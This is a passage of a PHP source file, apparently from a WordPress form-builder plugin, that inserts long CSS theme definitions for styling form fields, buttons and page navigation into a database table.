16px 0px;\r\nfont-size:18px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 7px;\r\n	height: 32px;\r\n	overflow: hidden;\r\n	border: 1px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #004D8E;\r\n	outline: none;\r\n}\r\n\r\ninput[type="password"]:focus{\r\n	border-color: #004D8E;\r\n	outline: none;\r\n}\r\n\r\ntextarea:focus{\r\n	border-color: #004D8E;\r\n	outline: none;\r\n}\r\n\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 70px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 15px;\r\n	height: 16px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 5px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/01/checkbox.png);\r\n	border-radius: 2px;\r\n	top: 0px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/01/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 37px;\r\n	height: 30px;\r\n	position: relative;\r\n	left: -35px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.wdform-calendar-button:focus {\r\n	outline:none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 15px;\r\n	height: 16px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 5px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 10px;\r\n	background: #615F60;\r\n	border-radius: 2px;\r\n	top: 3px;\r\n	left: 3px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	border-top: 1px solid #D8D6D7;\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 7px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #0D5492;\r\n	cursor: pointer;\r\n	background-color: #7FA6C6;\r\n	margin: 1px;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #004D8E;\r\n	margin: 1px;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 25px;\r\n	line-height: 25px;\r\n	border-top-left-radius: 17px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #00559D ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #00559D 0%, #005BA7 67%, #00559D 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #00559D ), color-stop(67%, #005BA7 ), color-stop(100%, #00559D )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #00559D 0%, #005BA7 67%, #00559D 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #00559D 0%, #005BA7 67%, #00559D 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #00559D 0%, #005BA7 67%, #00559D 100%); /* IE10+ */\r\nbackground: linear-gradient(to right, #00559D 0%, #005BA7 67%, #00559D 100%);\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 25px;\r\n	line-height: 25px;\r\n	background-color: #7FA6C6;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n	border-top-left-radius: 17px;\r\n	border-top-right-radius: 17px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation span:first-child {\r\n	border-top-left-radius: 17px;\r\n}\r\n.wdform_percentage_arrow {\r\ndisplay: inline-block;\r\nwidth: 21px;\r\nheight: 25px;\r\nbackground-color: #0057A0;\r\nposition: relative;\r\nleft: -15px;\r\nz-index: 0;\r\nvertical-align: middle;\r\n-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\ntransform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-10deg) skewY(0deg);\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -14px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 25px;\r\n	height: 25px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform_button button {\r\n	background: #e4e4e4; /* Old browsers */\r\n	background: -moz-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, left bottom, color-stop(0%, #e4e4e4), color-stop(100%, #cccccc)); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(top, #e4e4e4 0%, #cccccc 100%); /* IE10+ */\r\n	background: linear-gradient(to bottom, #e4e4e4 0%, #cccccc 100%); /* W3C */\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\', 0)');
    $wpdb->query('INSERT INTO `' . $wpdb->prefix . 'formmaker_themes` (`title`, `css`, `default`) VALUES(\'Theme 10 green\', \'.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #D8E5DB;\r\nborder: 1px solid #007616;\r\nmargin-bottom: 10px;\r\ncolor: #007616;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/01/03/next_hoverbg.png) url([SITE_ROOT]/images/01/03/previous_hover.png) url([SITE_ROOT]/images/01/03/next_hover.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #006C14 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff;\r\n	margin: 7px 0px;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 10px;\r\n	border: 2px solid #fff;\r\n	background: #A4A4A4;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -8px !important;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #A4A4A4 !important;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 7px;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 26px;\r\n	line-height: 26px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 28px;\r\n	width: 32px;\r\n	background: url([SITE_ROOT]/images/01/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 1px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-page-and-images:after {\r\n	width: 100%;\r\n	content: "";\r\n	display: block;\r\n	height: 17px;\r\n	background: url([SITE_ROOT]/images/01/0.png) no-repeat center center;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -17px;\r\n	left: -50px;\r\n	padding-left: 100px;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 7px;\r\n	height: 27px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n//text-overflow: ellipsis;\r\n}\r\n.file-picker {\r\n	width: 38px;\r\n	height: 34px;\r\n	background: url([SITE_ROOT]/images/01/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #414141;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background: url([SITE_ROOT]/images/01/nextbg.png) no-repeat right center;\r\n	-webkit-background-size: cover;\r\n	-moz-background-size: cover;\r\n	-o-background-size: cover;\r\n	background-size: cover;\r\n	border-style: solid;\r\n	padding: 0px 15px;\r\n	vertical-align: middle;\r\n	border-color: transparent;\r\n}\r\ndiv.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/01/03/next_hoverbg.png) no-repeat right center;\r\n	-webkit-background-size: cover;\r\n	-moz-background-size: cover;\r\n	-o-background-size: cover;\r\n	background-size: cover;\r\ncolor:#fff;\r\n}\r\n.next-page div.wdform-page-button {\r\n	border-width: 0px 18px 0px 0px;\r\n	-moz-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/next.png) 0 36 0 0 stretch;\r\n	box-shadow: inset 51px 0px 8px -50px #636363;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	-moz-border-image: url([SITE_ROOT]/images/01/03/next_hover.png) 0 36 0 0 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/03/next_hover.png) 0 36 0 0 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/03/next_hover.png) 0 36 0 0 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/03/next_hover.png) 0 36 0 0 stretch;\r\n}\r\n.next-page:before {\r\n	content: "";\r\n	height: 56px;\r\n	vertical-align: middle;\r\n	background: url([SITE_ROOT]/images/01/shadow.png) no-repeat left center;\r\n	background-size: contain;\r\n	width: 7px;\r\n	display: inline-block;\r\n	position: relative;\r\n	left: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	border-width: 0px 0px 0px 18px;\r\n	-moz-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/previous.png) 0 0 0 36 stretch;\r\n	box-shadow: inset -51px 0px 8px -50px #636363;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	-moz-border-image: url([SITE_ROOT]/images/01/03/previous_hover.png) 0 0 0 36 stretch;\r\n	-webkit-border-image: url([SITE_ROOT]/images/01/03/previous_hover.png) 0 0 0 36 stretch;\r\n	-o-border-image: url([SITE_ROOT]/images/01/03/previous_hover.png) 0 0 0 36 stretch;\r\n	border-image: url([SITE_ROOT]/images/01/03/previous_hover.png) 0 0 0 36 stretch;\r\n}\r\n.previous-page:after {\r\n	content: "";\r\n	height: 56px;\r\n	vertical-align: middle;\r\n	background: url([SITE_ROOT]/images/01/shadow1.png) no-repeat right center;\r\n	background-size: contain;\r\n	width: 7px;\r\n	display: inline-block;\r\n	position: relative;\r\n	left: -7px;\r\n}\r\n.button-submit {\r\nbackground: #006C14 ;\r\nbackground: -moz-linear-gradient(left, #006C14 0%, #018819 20%, #018819 80%, #006C14 100%);\r\nbackground: -webkit-gradient(linear, left top, right top, color-stop(0%, #006C14 ), color-stop(20%, #018819 ), color-stop(80%, #018819 ), color-stop(100%, #006C14 ));\r\nbackground: -webkit-linear-gradient(left, #006C14 0%, #018819 20%, #018819 80%, #006C14 100%);\r\nbackground: -o-linear-gradient(left, #006C14 0%, #018819 20%, #018819 80%, #006C14 100%);\r\nbackground: -ms-linear-gradient(left, #006C14 0%, #018819 20%, #018819 80%, #006C14 100%);\r\nbackground: linear-gradient(to right, #006C14 0%, #018819 20%, #018819 80%, #006C14 100%);\r\ncursor: pointer;\r\nfont-size: 17px;\r\nborder-radius: 7px;\r\nmin-width: 80px;\r\nmin-height: 34px;\r\ncolor: #fff;\r\nborder: 1px solid #0DBB2C;\r\nmargin: 5px;\r\nbox-shadow: 0px 0px 1px 1px #006C14;\r\nfont-family: Segoe UI;\r\n	}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 7px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 1px solid #c9c9c9;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: #D8E5DB;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n	border-top: 1px solid #006C14;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break2 {\r\n	background: url([SITE_ROOT]/images/01/shadow.png) no-repeat left center;\r\n	background-size: contain;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #006312 ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #006312 1%, #047519 20%, #057C1C 80%, #069140 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(1%, #006312 ), color-stop(20%, #047519 ), color-stop(80%, #057C1C ), color-stop(100%, #069140 )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #006312 1%, #047519 20%, #057C1C 80%, #069140 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #006312 1%, #047519 20%, #057C1C 80%, #069140 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #006312 1%, #047519 20%, #057C1C 80%, #069140 100%); /* IE10+ */\r\nbackground: linear-gradient(to right, #006312 1%, #047519 20%, #057C1C 80%, #069140 100%); /* W3C */\r\n	text-align: left;\r\n	padding: 7px 30px 10px 10px;\r\n	border-top-left-radius: 0px;\r\n	border-top-right-radius: 10px;\r\n	border-bottom-right-radius: 10px;\r\n	border-bottom-left-radius: 0px;\r\n	-moz-box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\n	box-shadow: inset 51px 0px 8px -50px #636363, 4px 0px 7px 0px rgba(0, 0, 0, 0.23);\r\ncolor:#fff;\r\nfont-size:18px;\r\n}\r\n\r\n.wdform_section_break {\r\n	margin: 16px 0px;\r\nfont-size:18px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 7px;\r\n	height: 32px;\r\n	overflow: hidden;\r\n	border: 1px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 7px;\r\n	height: 30px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type="text"]:focus{\r\n	border-color: #006C14;\r\n	outline: none;\r\n}\r\n\r\ninput[type="password"]:focus{\r\n	border-color: #006C14;\r\n	outline: none;\r\n}\r\n\r\ntextarea:focus{\r\n	border-color: #006C14;\r\n	outline: none;\r\n}\r\n\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 70px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 15px;\r\n	height: 16px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 5px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/01/checkbox.png);\r\n	border-radius: 2px;\r\n	top: 0px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/01/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 37px;\r\n	height: 30px;\r\n	position: relative;\r\n	left: -35px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.wdform-calendar-button:focus {\r\n	outline:none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 15px;\r\n	height: 